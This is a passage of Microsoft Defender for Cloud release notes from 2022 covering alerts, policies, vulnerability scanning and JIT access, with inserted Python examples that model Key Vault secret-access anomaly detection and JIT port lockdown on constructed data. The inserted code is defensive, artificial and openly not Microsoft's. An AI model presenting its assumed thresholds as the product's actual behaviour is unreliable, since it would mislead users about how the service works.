In Defender for Cloud, when you enable auto-provisioning for AMA, the agent is deployed on existing and new VMs and Azure Arc-enabled machines that are detected in your subscriptions. If Defender for Cloud plans are enabled, AMA collects configuration information and event logs from Azure VMs and Azure Arc machines. The AMA integration is in preview, so we recommend using it in test environments rather than in production environments.


Deprecated VM alerts regarding suspicious activity related to a 
Kubernetes cluster 


The following table lists the alerts that were deprecated:

Alert name | Description | Tactics | Severity
Docker build operation detected on a Kubernetes node (VM_ImageBuildOnNode) | Machine logs indicate a build operation of a container image on a Kubernetes node. While this behavior might be legitimate, attackers might build their malicious images locally to avoid detection. | Defense Evasion | Low
Suspicious request to Kubernetes API (VM_KubernetesAPI) | Machine logs indicate that a suspicious request was made to the Kubernetes API. The request was sent from a Kubernetes node, possibly from one of the containers running in the node. Although this behavior can be intentional, it might indicate that the node is running a compromised container. | Lateral Movement | Medium
SSH server is running inside a container (VM_ContainerSSH) | Machine logs indicate that an SSH server is running inside a Docker container. While this behavior can be intentional, it frequently indicates that a container is misconfigured or breached. | Execution | Medium

These alerts are used to notify a user about suspicious activity connected to a Kubernetes cluster. The alerts will be replaced with matching alerts that are part of the Microsoft Defender for Cloud Container alerts (K8S.NODE_ImageBuildOnNode, K8S.NODE_KubernetesAPI and K8S.NODE_ContainerSSH), which provide improved fidelity and comprehensive context to investigate and act on the alerts. Learn more about alerts for Kubernetes clusters.


Container vulnerabilities now include detailed package information 


Defender for Container's vulnerability assessment (VA) now includes detailed package information for 
each finding, including: package name, package type, path, installed version, and fixed version. The 
package information lets you find vulnerable packages so you can remediate the vulnerability or 
remove the package. 


This detailed package information is available for new scans of images. 


[Screenshot: the recommendation Container registry images should have vulnerability findings resolved, opened on the finding CVE-2021-45046 for a Linux image (digest beginning sha256:a24e6faa2337, tag latest, 26 vulnerabilities: 17 high, 9 medium, 0 low, patchable). The package information pane shows name org.apache.logging.log4j:log4j-core, package type Java, path usr/share/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar, installed version 2.14.0, fixed version 2.17.0, and vendor reference GHSA-7rjr-3q55-vv33.]


July 2022 


Updates in July include: 


- General availability (GA) of the Cloud-native security agent for Kubernetes runtime protection 
- Defender for Container's VA adds support for the detection of language specific packages (Preview) 
- Protect against the Operations Management Infrastructure vulnerability CVE-2022-29149 
- Integration with Entra Permissions Management 
- Key Vault recommendations changed to "audit" 
- Deprecate API App policies for App Service 


General availability (GA) of the cloud-native security agent for 
Kubernetes runtime protection 


We're excited to share that the cloud-native security agent for Kubernetes runtime protection is now 
generally available (GA)! 


The production deployments of Kubernetes clusters continue to grow as customers continue to 
containerize their applications. To assist with this growth, the Defender for Containers team has 
developed a cloud-native, Kubernetes-oriented security agent. 


The new security agent is a Kubernetes DaemonSet, based on eBPF technology and is fully integrated 
into AKS clusters as part of the AKS Security Profile. 


The security agent enablement is available through auto-provisioning, recommendations flow, AKS RP 
or at scale using Azure Policy. 


You can deploy the Defender agent today on your AKS clusters. 


With this announcement, the runtime protection - threat detection (workload) is now also generally 
available. 


Learn more about the Defender for Container's feature availability. 
You can also review all available alerts. 


Note, if you're using the preview version, the AKS-AzureDefender feature flag is no longer required. 


Defender for Container's VA adds support for the detection of 
language specific packages (Preview) 


Defender for Container's vulnerability assessment (VA) is able to detect vulnerabilities in OS packages 
deployed via the OS package manager. We have now extended VA's abilities to detect vulnerabilities 
included in language-specific packages. 

This feature is in preview and is only available for Linux images. 


To see all of the included language specific packages that have been added, check out Defender for 
Container's full list of features and their availability. 


Protect against the Operations Management Infrastructure 
vulnerability CVE-2022-29149 


Operations Management Infrastructure (OMI) is a collection of cloud-based services for managing on- 
premises and cloud environments from one single place. Rather than deploying and managing on- 
premises resources, OMI components are entirely hosted in Azure. 


Log Analytics integrated with Azure HDInsight running OMI version 13 requires a patch to remediate 
CVE-2022-29149. Review the report about this vulnerability in the Microsoft Security Update guide 
for information about how to identify resources that are affected by this vulnerability and remediation 
steps. 


If you have Defender for Servers enabled with Vulnerability Assessment, you can use this workbook 
to identify affected resources. 


Integration with Entra Permissions Management 


Defender for Cloud has integrated with Microsoft Entra Permissions Management, a cloud 
infrastructure entitlement management (CIEM) solution that provides comprehensive visibility and 
control over permissions for any identity and any resource in Azure, AWS, and GCP. 


Each Azure subscription, AWS account, and GCP project that you onboard will now show you a view of 
your Permission Creep Index (PCI). 


Learn more about Entra Permissions Management (formerly CloudKnox). 


Key Vault recommendations changed to "audit" 


The effect for the Key Vault recommendations listed here was changed to "audit": 


Recommendation name | Recommendation ID 
Validity period of certificates stored in Azure Key Vault should not exceed 12 months | fc84abc0-eee6-4758-8372-a7681965ca44 
Key Vault secrets should have an expiration date | 14257785-9437-97fa-11ae-898cfb24302b 
Key Vault keys should have an expiration date | 1aabfa0d-7585-f9f5-1d92-ecb40291d9f2 


Deprecate API App policies for App Service 


We deprecated the following policies in favor of corresponding policies that already exist and now include API apps: 


To be deprecated | Changing to 
Ensure API app has 'Client Certificates (Incoming client certificates)' set to 'On' | App Service apps should have 'Client Certificates (Incoming client certificates)' enabled 
Ensure that 'Python version' is the latest, if used as a part of the API app | App Service apps that use Python should use the latest 'Python version' 
CORS should not allow every resource to access your API App | App Service apps should not have CORS configured to allow every resource to access your apps 
Managed identity should be used in your API App | App Service apps should use managed identity 
Remote debugging should be turned off for API Apps | App Service apps should have remote debugging turned off 
Ensure that 'PHP version' is the latest, if used as a part of the API app | App Service apps that use PHP should use the latest 'PHP version' 
FTPS only should be required in your API App | App Service apps should require FTPS only 
Ensure that 'Java version' is the latest, if used as a part of the API app | App Service apps that use Java should use the latest 'Java version' 
Latest TLS version should be used in your API App | App Service apps should use the latest TLS version 


June 2022 


Updates in June include: 


- General availability (GA) for Microsoft Defender for Azure Cosmos DB 
- General availability (GA) of Defender for SQL on machines for AWS and GCP environments 
- Drive implementation of security recommendations to enhance your security posture 
- Filter security alerts by IP address 
- Alerts by resource group 
- Auto-provisioning of Microsoft Defender for Endpoint unified solution 
- Deprecating the "API App should only be accessible over HTTPS" policy 
- New Key Vault alerts 


General availability (GA) for Microsoft Defender for Azure Cosmos 
DB 


Microsoft Defender for Azure Cosmos DB is now generally available (GA) and supports SQL (core) API 
account types. 


This new release to GA is a part of the Microsoft Defender for Cloud database protection suite, which 
includes different types of SQL databases, and MariaDB. Microsoft Defender for Azure Cosmos DB is an 
Azure native layer of security that detects attempts to exploit databases in your Azure Cosmos DB 
accounts. 


By enabling this plan, you'll be alerted to potential SQL injections, known bad actors, suspicious access 
patterns, and potential explorations of your database through compromised identities, or malicious 
insiders. 


When potentially malicious activities are detected, security alerts are generated. These alerts provide 
details of suspicious activity along with the relevant investigation steps, remediation actions, and 
security recommendations. 


Microsoft Defender for Azure Cosmos DB continuously analyzes the telemetry stream generated by the 
Azure Cosmos DB services and cross-references it with Microsoft Threat Intelligence and behavioral models 
to detect any suspicious activity. Defender for Azure Cosmos DB doesn't access the Azure Cosmos DB 
account data and doesn't have any effect on your database's performance. 


Learn more about Microsoft Defender for Azure Cosmos DB. 


With the addition of support for Azure Cosmos DB, Defender for Cloud now provides one of the most 
comprehensive workload protection offerings for cloud-based databases. Security teams and database 
owners can now have a centralized experience to manage their database security of their 
environments. 


Learn how to enable protections for your databases. 


General availability (GA) of Defender for SQL on machines for AWS 
and GCP environments 


The database protection capabilities provided by Microsoft Defender for Cloud have added support for 
your SQL servers that are hosted in either AWS or GCP environments. 


With Defender for SQL, enterprises can now protect their entire database estate, hosted in Azure, AWS, GCP 
and on-premises machines. 


Microsoft Defender for SQL provides a unified multicloud experience to view security 
recommendations, security alerts and vulnerability assessment findings for both the SQL server and the 
underlying Windows OS. 


Using the multicloud onboarding experience, you can enable and enforce database protection for SQL 
servers running on AWS EC2, RDS Custom for SQL Server and GCP compute engine. Once you've 
enabled either of these plans, all supported resources that exist within the subscription are protected. 


Future resources created on the same subscription will also be protected. 


Learn how to protect and connect your AWS environment and your GCP organization with Microsoft 
Defender for Cloud. 


Drive implementation of security recommendations to enhance 
your security posture 


Today's increasing threats to organizations stretch the limits of security personnel to protect their 
expanding workloads. Security teams are challenged to implement the protections defined in their 
security policies. 


Now with the governance experience in preview, security teams can assign remediation of security 
recommendations to the resource owners and require a remediation schedule. They can have full 
transparency into the progress of the remediation and get notified when tasks are overdue. 


Learn more about the governance experience in Driving your organization to remediate security issues 
with recommendation governance. 


Filter security alerts by IP address 


In many cases of attacks, you want to track alerts based on the IP address of the entity involved in the 
attack. Up until now, the IP appeared only in the "Related Entities" section in the single alert pane. 
Now, you can filter the alerts in the security alerts page to see the alerts related to the IP address, and 
you can search for a specific IP address. 


Alerts by resource group 


The ability to filter, sort and group by resource group has been added to the Security alerts page. 


A resource group column has been added to the alerts grid. 




A new filter has been added which allows you to view all of the alerts for specific resource groups. 




You can now also group your alerts by resource group to view all of your alerts for each of your 
resource groups. 


Auto-provisioning of Microsoft Defender for Endpoint unified solution 


Until now, the integration with Microsoft Defender for Endpoint (MDE) included automatic installation 
of the new MDE unified solution for machines (Azure subscriptions and multicloud connectors) with 
Defender for Servers Plan 1 enabled, and for multicloud connectors with Defender for Servers Plan 2 
enabled. Plan 2 for Azure subscriptions enabled the unified solution for Linux machines and Windows 
2019 and 2022 servers only. Windows servers 2012R2 and 2016 used the MDE legacy solution 
dependent on Log Analytics agent. 


Now, the new unified solution is available for all machines in both plans, for both Azure subscriptions 
and multicloud connectors. For Azure subscriptions with Servers Plan 2 that enabled MDE integration 
after June 20, 2022, the unified solution is enabled by default for all machines. Azure subscriptions with 
the Defender for Servers Plan 2 enabled with MDE integration before June 20, 2022 can now enable 
unified solution installation for Windows servers 2012R2 and 2016 through the dedicated button in the 
Integrations page. 


Learn more about MDE integration with Defender for Servers. 


Deprecating the "API App should only be accessible over HTTPS" 
policy 


The policy API App should only be accessible over HTTPS has been deprecated. This policy is replaced 
with the Web Application should only be accessible over HTTPS policy, which has been renamed to 
App Service apps should only be accessible over HTTPS. 


To learn more about policy definitions for Azure App Service, see Azure Policy built-in definitions for 
Azure App Service. 


New Key Vault alerts 


To expand the threat protections provided by Microsoft Defender for Key Vault, we've added two new 
alerts. 


These alerts inform you when an access denied anomaly is detected for any of your key vaults. 


Alert (alert type) | Description | MITRE tactics | Severity 
Unusual access denied - User accessing high volume of key vaults denied (KV_DeniedAccountVolumeAnomaly) | A user or service principal has attempted access to an anomalously high volume of key vaults in the last 24 hours. This anomalous access pattern may be legitimate activity. Though this attempt was unsuccessful, it could be an indication of a possible attempt to gain access to a key vault and the secrets contained within it. We recommend further investigation. | Discovery | Low 
Unusual access denied - Unusual user accessing key vault denied (KV_UserAccessDeniedAnomaly) | A key vault access was attempted by a user that doesn't normally access it. This anomalous access pattern may be legitimate activity. Though this attempt was unsuccessful, it could be an indication of a possible attempt to gain access to a key vault and the secrets contained within it. | Initial Access, Discovery | Low 
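As an added illustration (not Microsoft's detection logic, which the note does not describe), the following Python models both access-denied anomalies over a constructed Key Vault audit log: a volume spike in distinct vaults denying one caller, and a denial on a vault the caller has never successfully used. The record format, the identity names, the 24-hour window and the thresholds are assumptions.

```python
"""Added example (not Microsoft's detection logic): models the two access-denied
anomalies above over a constructed Key Vault audit log."""
from datetime import datetime, timedelta

# Constructed audit records: (timestamp, caller, vault, result).
# "Forbidden" models an access-denied (HTTP 403) response; "OK" a granted request.
SAMPLE_LOG = [
    # Baseline: a backend identity reads its two vaults every day.
    ("2022-06-01T09:00:00", "app-backend", "kv-prod-1", "OK"),
    ("2022-06-01T09:05:00", "app-backend", "kv-prod-2", "OK"),
    ("2022-06-02T09:00:00", "app-backend", "kv-prod-1", "OK"),
    ("2022-06-02T09:05:00", "app-backend", "kv-prod-2", "OK"),
    # Baseline: alice is denied once on her own dev vault (ordinary noise).
    ("2022-06-02T10:00:00", "alice", "kv-dev-1", "Forbidden"),
    # Day of interest: alice is denied on nine different vaults within an hour.
    *[(f"2022-06-03T14:{m:02d}:00", "alice", f"kv-{m}", "Forbidden") for m in range(9)],
    # Day of interest: bob, who has never accessed kv-prod-1, is denied on it.
    ("2022-06-03T15:00:00", "bob", "kv-prod-1", "Forbidden"),
]

# Evaluation time used below and in the stand-alone run (assumed).
NOW = datetime(2022, 6, 3, 16, 0)


def parse(records):
    return [(datetime.fromisoformat(ts), caller, vault, result)
            for ts, caller, vault, result in records]


def denied_vaults(records, caller, end, window=timedelta(hours=24)):
    """Distinct vaults on which `caller` was denied inside (end - window, end]."""
    start = end - window
    return {vault for ts, c, vault, result in records
            if c == caller and result == "Forbidden" and start < ts <= end}


def volume_anomalies(records, now, baseline_days=7, factor=3, minimum=5):
    """Model of KV_DeniedAccountVolumeAnomaly.

    A caller is flagged when the number of distinct vaults that denied it in the
    last 24 hours is at least `minimum` and more than `factor` times that
    caller's worst day over the preceding `baseline_days`. The floor keeps a
    caller with a zero baseline from being flagged on a single denial.
    """
    recs = parse(records)
    findings = {}
    for caller in {c for _, c, _, _ in recs}:
        current = len(denied_vaults(recs, caller, now))
        peak = max(len(denied_vaults(recs, caller, now - timedelta(days=d)))
                   for d in range(1, baseline_days + 1))
        if current >= minimum and current > factor * peak:
            findings[caller] = current
    return findings


def unusual_caller_denials(records, now, window=timedelta(hours=24)):
    """Model of KV_UserAccessDeniedAnomaly: a denial on a vault from a caller
    with no successful access to that vault before the current window."""
    recs = parse(records)
    start = now - window
    known = {(c, vault) for ts, c, vault, result in recs
             if ts <= start and result == "OK"}
    return sorted({(c, vault) for ts, c, vault, result in recs
                   if start < ts <= now and result == "Forbidden"
                   and (c, vault) not in known})


if __name__ == "__main__":
    print("volume anomalies:", volume_anomalies(SAMPLE_LOG, NOW))
    print("unusual callers:", unusual_caller_denials(SAMPLE_LOG, NOW))
```

Both models deliberately keep the denied attempts that the alert text calls "possibly legitimate": the output is a triage queue, not a verdict.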


May 2022 


Updates in May include: 


- Multicloud settings of Servers plan are now available in connector level 
- JIT (Just-in-time) access for VMs is now available for AWS EC2 instances (Preview) 
- Add and remove the Defender agent for AKS clusters using the CLI 


Multicloud settings of Servers plan are now available in connector 
level 


There are now connector-level settings for Defender for Servers in multicloud. 


The new connector-level settings provide granularity for pricing and auto-provisioning configuration 
per connector, independently of the subscription. 


All auto-provisioning components available at the connector level (Azure Arc, MDE, and vulnerability 
assessments) are enabled by default, and the new configuration supports both Plan 1 and Plan 2 
pricing tiers. 


Updates in the UI include a reflection of the selected pricing tier and the required components 
configured. 


[Screenshot: Create GCP connector, Select plans step. Each plan row shows its Configurations, Pricing and Plan status; the Auto-provisioning configuration pane for the Servers plan lists the Azure Arc agent, the Microsoft Defender for Endpoint extension, Vulnerability assessment (Microsoft threat and vulnerability management or the Defender for Cloud integrated Qualys scanner) and the Log Analytics extension, each with an On/Off toggle.] 


Changes to vulnerability assessment 


Defender for Containers now displays vulnerabilities that have medium and low severities that aren't 
patchable. 


As part of this update, vulnerabilities that have medium and low severities are now shown, whether or 
not patches are available. This update provides maximum visibility, but still allows you to filter out 
undesired vulnerabilities by using the provided Disable rule. 


[Screenshot: Disable rule pane for the recommendation Container registry images should have vulnerability findings resolved. Findings can be disabled by Categories, Security checks, Minimum severity or Non-patchable, with an optional Justification; new rules take up to 30 minutes to apply to a subscription and up to 24 hours to a management group.] 


Learn more about vulnerability management 


JIT (Just-in-time) access for VMs is now available for AWS EC2 
instances (Preview) 


When you connect AWS accounts, JIT will automatically evaluate the network configuration of your 
instance's security groups and recommend which instances need protection for their exposed 
management ports. This is similar to how JIT works with Azure. When you onboard unprotected EC2 
instances, JIT will block public access to the management ports, and only open them with authorized 
requests for a limited time frame. 


Learn how JIT protects your AWS EC2 instances 
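As an added illustration (not Defender for Cloud code), the following Python models the JIT flow described above over constructed EC2 security-group ingress rules: evaluate which instances expose management ports to the internet, lock those ports down, and open one port to one source for a limited window that then expires. The management-port set, the instance inventory and the rule representation are assumptions.

```python
"""Added example (not Defender for Cloud code): models the JIT evaluation and
access flow described above over constructed EC2 security-group ingress rules."""
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Ports JIT treats as management ports by default for Azure VMs; assumed here
# to be the set that matters for EC2 too (assumption, not from the release note).
MANAGEMENT_PORTS = {22, 3389, 5985, 5986}


@dataclass
class Rule:
    """One security-group ingress rule; `expires` is set only on JIT grants."""
    from_port: int
    to_port: int
    cidr: str
    expires: Optional[datetime] = None

    def covers(self, port):
        return self.from_port <= port <= self.to_port


def is_public(cidr):
    """A /0 prefix (IPv4 or IPv6) means reachable from the whole internet."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def exposed_management_ports(rules):
    """Management ports that at least one public rule opens."""
    return {p for p in MANAGEMENT_PORTS
            for r in rules if is_public(r.cidr) and r.covers(p)}


def instances_needing_jit(instances):
    """instances: {instance_id: [Rule, ...]} -> {instance_id: sorted exposed ports}.
    This is the evaluation step that produces the JIT recommendation."""
    report = {}
    for instance_id, rules in instances.items():
        exposed = exposed_management_ports(rules)
        if exposed:
            report[instance_id] = sorted(exposed)
    return report


def lock_down(rules):
    """Drop public rules that reach a management port; other rules stay.
    A production implementation would narrow a wide range (for example
    0-65535) instead of dropping it, so unrelated ports keep working."""
    return [r for r in rules
            if not (is_public(r.cidr) and any(r.covers(p) for p in MANAGEMENT_PORTS))]


def grant_access(rules, port, source_cidr, now, minutes=60):
    """Authorized JIT request: open one management port to one specific
    source for a limited window. Returns the new rule list."""
    if port not in MANAGEMENT_PORTS:
        raise ValueError(f"port {port} is not a JIT-managed port")
    if is_public(source_cidr):
        raise ValueError("a JIT grant must name a specific source, not the internet")
    expiry = now + timedelta(minutes=minutes)
    return rules + [Rule(port, port, source_cidr, expires=expiry)]


def expire_grants(rules, now):
    """Revoke grants whose window has elapsed."""
    return [r for r in rules if r.expires is None or r.expires > now]


# Constructed inventory: three instances and their ingress rules.
INSTANCES = {
    "i-web": [Rule(443, 443, "0.0.0.0/0"), Rule(22, 22, "0.0.0.0/0")],
    "i-bastion": [Rule(22, 22, "10.0.0.0/8"), Rule(0, 65535, "::/0")],
    "i-db": [Rule(1433, 1433, "10.0.0.0/8")],
}

if __name__ == "__main__":
    print(instances_needing_jit(INSTANCES))
    t0 = datetime(2022, 5, 1, 12, 0)
    rules = grant_access(lock_down(INSTANCES["i-web"]), 22, "203.0.113.7/32", t0, 30)
    print([r.cidr for r in rules], "->",
          [r.cidr for r in expire_grants(rules, t0 + timedelta(minutes=31))])
```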


Add and remove the Defender agent for AKS clusters using the CLI 


The Defender agent is required for Defender for Containers to provide runtime protections and to 
collect signals from nodes. You can now use the Azure CLI to add and remove the Defender agent for 
an AKS cluster. 


Note: This option is included in Azure CLI 3.7 and above. 


April 2022 


Updates in April include: 


- New Defender for Servers plans 
- Relocation of custom recommendations 
- PowerShell script to stream alerts to Splunk and QRadar 
- Deprecated the Azure Cache for Redis recommendation 
- New alert variant for Microsoft Defender for Storage (preview) to detect exposure of sensitive data 
- Container scan alert title augmented with IP address reputation 
- See the activity logs that relate to a security alert 


New Defender for Servers plans 
Microsoft Defender for Servers is now offered in two incremental plans: 


- Defender for Servers Plan 2, formerly Defender for Servers 
- Defender for Servers Plan 1, provides support for Microsoft Defender for Endpoint only 


While Defender for Servers Plan 2 continues to provide protections from threats and vulnerabilities to 
your cloud and on-premises workloads, Defender for Servers Plan 1 provides endpoint protection only, 
powered by the natively integrated Defender for Endpoint. Read more about the Defender for Servers 
plans. 

If you have been using Defender for Servers until now, no action is required. 


In addition, Defender for Cloud also begins gradual support for the Defender for Endpoint unified 
agent for Windows Server 2012 R2 and 2016. Defender for Servers Plan 1 deploys the new unified 
agent to Windows Server 2012 R2 and 2016 workloads. 


Relocation of custom recommendations 


Custom recommendations are those created by users and have no effect on the secure score. The 
custom recommendations can now be found under the All recommendations tab. 


Use the new "recommendation type" filter to locate custom recommendations. 


Learn more in Create custom security initiatives and policies. 


PowerShell script to stream alerts to Splunk and IBM QRadar 


We recommend that you use Event Hubs and a built-in connector to export security alerts to Splunk 
and IBM QRadar. Now you can use a PowerShell script to set up the Azure resources needed to export 
security alerts for your subscription or tenant. 


Just download and run the PowerShell script. After you provide a few details of your environment, the 
script configures the resources for you. The script then produces output that you use in the SIEM 
platform to complete the integration. 


To learn more, see Stream alerts to Splunk and QRadar. 


Deprecated the Azure Cache for Redis recommendation 


The recommendation Azure Cache for Redis should reside within a virtual network (Preview) has 
been deprecated. We've changed our guidance for securing Azure Cache for Redis instances. We 
recommend the use of a private endpoint to restrict access to your Azure Cache for Redis instance, 
instead of a virtual network. 


New alert variant for Microsoft Defender for Storage (preview) to 
detect exposure of sensitive data 


Microsoft Defender for Storage's alerts notify you when threat actors attempt to scan and expose, 
successfully or not, misconfigured, publicly open storage containers to try to exfiltrate sensitive 
information. 


To allow for faster triaging and response time when exfiltration of potentially sensitive data may have 
occurred, we've released a new variation of the existing Publicly accessible storage containers have 
been exposed alert. 


The new alert, Publicly accessible storage containers with potentially sensitive data have been 
exposed, is triggered with a High severity level after there has been a successful discovery of publicly 
open storage container(s) with names that statistically have been found to rarely be exposed publicly, 
suggesting they might hold sensitive information. 


Alert (alert type) | Description | MITRE tactic | Severity 
PREVIEW - Publicly accessible storage containers with potentially sensitive data have been exposed (Storage.Blob_OpenContainersScanning.SuccessfulDiscovery.Sensitive) | Someone has scanned your Azure Storage account and exposed container(s) that allow public access. One or more of the exposed containers have names that indicate that they may contain sensitive data. This usually indicates reconnaissance by a threat actor that is scanning for misconfigured publicly accessible storage containers that may contain sensitive data. After a threat actor successfully discovers a container, they may continue by exfiltrating the data. Applies to: ✔ Azure Blob Storage, ✘ Azure Files, ✘ Azure Data Lake Storage Gen2 | Collection | High 


Container scan alert title augmented with IP address reputation 


An IP address's reputation can indicate whether the scanning activity originates from a known threat 
actor, or from an actor that is using the Tor network to hide their identity. Both of these indicators 
suggest that there's malicious intent. The IP address's reputation is provided by Microsoft Threat 
Intelligence. 


The addition of the IP address's reputation to the alert title provides a way to quickly evaluate the 
intent of the actor, and thus the severity of the threat. 


The following alerts will include this information: 

- Publicly accessible storage containers have been exposed 
- Publicly accessible storage containers with potentially sensitive data have been exposed 
- Publicly accessible storage containers have been scanned. No publicly accessible data was discovered 


For example, the added information in the title of the Publicly accessible storage containers have 
been exposed alert will look like this: 

- Publicly accessible storage containers have been exposed by a suspicious IP address 
- Publicly accessible storage containers have been exposed by a Tor exit node 

All of the alerts for Microsoft Defender for Storage will continue to include threat intelligence 
information in the IP entity under the alert's Related Entities section. 


See the activity logs that relate to a security alert 


As part of the actions you can take to evaluate a security alert, you can find the related platform logs in 
Inspect resource context to gain context about the affected resource. Microsoft Defender for Cloud 
identifies platform logs that are within one day of the alert. 


The platform logs can help you evaluate the security threat and identify steps that you can take to 
mitigate the identified risk. 


March 2022 


Updates in March include: 


- Global availability of Secure Score for AWS and GCP environments 
- Deprecated the recommendations to install the network traffic data collection agent 
- Defender for Containers can now scan for vulnerabilities in Windows images (preview) 
- New alert for Microsoft Defender for Storage (preview) 
- Configure email notifications settings from an alert 
- Deprecated preview alert: ARM.MCAS_ActivityFromAnonymousIPAddresses 
- Moved the recommendation Vulnerabilities in container security configurations should be remediated from the secure score to best practices 
- Deprecated the recommendation to use service principals to protect your subscriptions 
- Legacy implementation of ISO 27001 replaced with new ISO 27001:2013 initiative 
- Deprecated Microsoft Defender for IoT device recommendations 
- Deprecated Microsoft Defender for IoT device alerts 
- Posture management and threat protection for AWS and GCP released for general availability (GA) 
- Registry scan for Windows images in ACR added support for national clouds 


Global availability of Secure Score for AWS and GCP environments 


The cloud security posture management capabilities provided by Microsoft Defender for Cloud have 
now added support for your AWS and GCP environments within your Secure Score. 


Enterprises can now view their overall security posture across various environments, such as Azure, 
AWS and GCP. 


The Secure Score page has been replaced with the Security posture dashboard. The Security posture 
dashboard allows you to view an overall combined score for all of your environments, or a breakdown 
of your security posture based on any combination of environments that you choose. 


The Recommendations page has also been redesigned to provide new capabilities such as: cloud 
environment selection, advanced filters based on content (resource group, AWS account, GCP project 
and more), improved user interface on low resolution, support for open query in resource graph, and 
more. You can learn more about your overall security posture and security recommendations. 


Deprecated the recommendations to install the network traffic 
data collection agent 


Changes in our roadmap and priorities have removed the need for the network traffic data collection 
agent. The following two recommendations and their related policies were deprecated. 


Recommendation | Description | Severity 
Network traffic data collection agent should be installed on Linux virtual machines | Defender for Cloud uses the Microsoft Dependency agent to collect network traffic data from your Azure virtual machines to enable advanced network protection features such as traffic visualization on the network map, network hardening recommendations and specific network threats. | Medium 
Network traffic data collection agent should be installed on Windows virtual machines | Defender for Cloud uses the Microsoft Dependency agent to collect network traffic data from your Azure virtual machines to enable advanced network protection features such as traffic visualization on the network map, network hardening recommendations, and specific network threats. | Medium 


Defender for Containers can now scan for vulnerabilities in 
Windows images (preview) 


Defender for Container's image scan now supports Windows images that are hosted in Azure 
Container Registry. This feature is free while in preview, and will incur a cost when it becomes generally 
available. 


Learn more in Use Microsoft Defender for Container to scan your images for vulnerabilities. 


New alert for Microsoft Defender for Storage (preview) 


To expand the threat protections provided by Microsoft Defender for Storage, we've added a new 
preview alert. 


Threat actors use applications and tools to discover and access storage accounts. Microsoft Defender 
for Storage detects these applications and tools so that you can block them and remediate your 
posture. 


This preview alert is called Access from a suspicious application. The alert is relevant to Azure Blob 
Storage, and ADLS Gen2 only. 


Alert (alert type) | Description | MITRE tactic | Severity 
PREVIEW - Access from a suspicious application (Storage.Blob_SuspiciousApp) | Indicates that a suspicious application has successfully accessed a container of a storage account with authentication. This might indicate that an attacker has obtained the credentials necessary to access the account, and is exploiting it. This could also be an indication of a penetration test carried out in your organization. Applies to: Azure Blob Storage, Azure Data Lake Storage Gen2 | Initial Access | Medium 


Configure email notification settings from an alert

A new section has been added to the alert user interface (UI) that lets you view and edit who will receive email notifications for alerts triggered on the current subscription.

[Screenshot: the "Configure email notification settings" section of an alert, which reads "Configure who'll get emails regarding security alerts for this subscription" and offers a "Configure settings" link.]

Learn how to Configure email notifications for security alerts.


Deprecated preview alert: ARM.MCAS_ActivityFromAnonymousIPAddresses

The following preview alert has been deprecated:

Alert name: PREVIEW - Activity from a risky IP address (ARM.MCAS_ActivityFromAnonymousIPAddresses)
Description: User activity from an IP address that has been identified as an anonymous proxy IP address has been detected. These proxies are used by people who want to hide their device's IP address, and can be used for malicious intent. This detection uses a machine learning algorithm that reduces false positives, such as mis-tagged IP addresses that are widely used by users in the organization. Requires an active Microsoft Defender for Cloud Apps license.

A new alert has been created that provides this information and adds to it. In addition, the newer alerts (ARM_OperationFromSuspiciousIP, ARM_OperationFromSuspiciousProxyIP) don't require a license for Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security).

See more alerts for Resource Manager.


Moved the recommendation Vulnerabilities in container security configurations should be remediated from the secure score to best practices

The recommendation Vulnerabilities in container security configurations should be remediated has been moved from the secure score section to the best practices section.

The current user experience only provides the score when all compliance checks have passed. Most customers have difficulties meeting all the required checks. We're working on an improved experience for this recommendation, and once it's released the recommendation will be moved back to the secure score.


Deprecated the recommendation to use service principals to protect your subscriptions

As organizations move away from using management certificates to manage their subscriptions, and following our recent announcement that we're retiring the Cloud Services (classic) deployment model, we deprecated the following Defender for Cloud recommendation and its related policy:

Recommendation: Service principals should be used to protect your subscriptions instead of Management Certificates
Description: Management certificates allow anyone who authenticates with them to manage the subscription(s) they're associated with. To manage subscriptions more securely, using service principals with Resource Manager is recommended to limit the blast radius in the case of a certificate compromise. It also automates resource management. (Related policy: Service principals should be used to protect your subscriptions instead of management certificates)
Severity: Medium

Learn more:

- Cloud Services (classic) deployment model is retiring on 31 August 2024
- Overview of Azure Cloud Services (classic)
- Workflow of Microsoft Azure classic VM Architecture - including RDFE workflow basics


Legacy implementation of ISO 27001 replaced with new ISO 27001:2013 initiative

The legacy implementation of ISO 27001 has been removed from Defender for Cloud's regulatory compliance dashboard. If you're tracking your ISO 27001 compliance with Defender for Cloud, onboard the new ISO 27001:2013 standard for all relevant management groups or subscriptions.
Deprecated Microsoft Defender for IoT device recommendations

Microsoft Defender for IoT device recommendations are no longer visible in Microsoft Defender for Cloud. These recommendations are still available on Microsoft Defender for IoT's Recommendations page.

The following recommendations are deprecated (assessment key and resource type, followed by the recommendation):

- 1a36f14a-8bd8-45f5-abe5-eef88d76ab5b (IoT Devices): Open Ports On Device
- ba975338-f956-41e7-a9f2-7614832d382d (IoT Devices): Permissive firewall rule in the input chain was found
- beb62be3-5e78-49bd-ac5f-099250ef3c7c (IoT Devices): Permissive firewall policy in one of the chains was found
- d5a8d84a-9ad0-42e2-80e0-d38e3d46028a (IoT Devices): Permissive firewall rule in the output chain was found
- 5f65e47f-7a00-4bf3-acae-90ee441ee876 (IoT Devices): Operating system baseline validation failure
- a9a59ebb-5d6f-42f5-92a1-036fd0fd1879 (IoT Devices): Agent sending underutilized messages
- 2acc27c6-5fdb-405e-9080-cb66b850c8f5 (IoT Devices): TLS cipher suite upgrade needed
- d74d2738-2485-4103-9919-69c7e63776ec (IoT Devices): Auditd process stopped sending events


Deprecated Microsoft Defender for IoT device alerts

All Microsoft Defender for IoT device alerts are no longer visible in Microsoft Defender for Cloud. These alerts are still available on Microsoft Defender for IoT's Alerts page and in Microsoft Sentinel.


Posture management and threat protection for AWS and GCP released for general availability (GA)

- Defender for Cloud's CSPM features extend to your AWS and GCP resources. This agentless plan assesses your multicloud resources according to cloud-specific security recommendations that are included in your secure score. The resources are assessed for compliance using the built-in standards. Defender for Cloud's asset inventory page is a multicloud enabled feature that allows you to manage your AWS resources alongside your Azure resources.

